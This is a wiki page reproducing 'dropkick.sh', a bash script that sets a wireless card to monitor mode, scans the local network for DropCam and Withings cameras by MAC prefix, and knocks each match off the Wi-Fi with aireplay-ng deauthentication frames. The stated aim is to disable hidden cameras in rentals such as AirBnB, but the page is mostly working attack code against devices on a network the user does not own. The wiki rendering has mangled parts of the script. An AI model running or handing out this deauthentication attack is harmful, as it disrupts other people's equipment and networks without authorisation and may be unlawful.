Drop Wifi Cams

From HyperSecurity Wiki
Revision as of 17:49, 19 December 2015 by 24.84.196.44 (talk)
(diff) ←Older revision | view current revision (diff) | Newer revision→ (diff)
Jump to: navigation, search
  1. !/bin/bash
  3. DROPKICK.SH
  5. Detect and Disconnect the DropCam and Withings devices some people are using to
  6. spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
  8. http://julianoliver.com/output/log_2014-05-30_20-52
  10. This script was named by Adam Harvey (http://ahprojects.com), who also
  11. encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
  12. etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
  13. notification. Comment it out if you don't need it.
  15. See also http://plugunplug.net, for a plug-and-play device that does this
  16. based on OpenWrt. Code here:
  18. https://github.com/JulianOliver/CyborgUnplug
  20. Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
  22. sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>

shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell.

readonly NIC=$1 # Your wireless NIC readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')

  1. MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
  2. present.

readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings readonly POLL=30 # Check every 30 seconds readonly LOG=/var/log/dropkick.log

airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device

while true; 

   do  
       for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
       '(xdigit:{1,2}:){5}xdigit:{1,2}')
          do
              if "$TARGET" == "$GGMAC" 
                  then
                      # Audio alert
                      beep -f 1000 -l 500 -n 200 -r 2
                      echo "WiFi camera discovered: "$TARGET >> $LOG
                      aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                      echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
                      echo '
                            __              __    _     __          __                      
                        ___/ /______  ___  / /__ (_)___/ /_____ ___/ / 
                       / _  / __/ _ \/ _ \/   _// / __/   _/ -_) _  / 
                       \_,_/_/  \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/  
                                   /_/

                      '                                        
                   else
                       echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
              fi
          done
          echo "None found this round."
          sleep $POLL

done airmon-ng stop mon0

Retrieved from "http://www.hypersecuresolutions.com/wiki/index.php?title=Drop_Wifi_Cams&oldid=2098"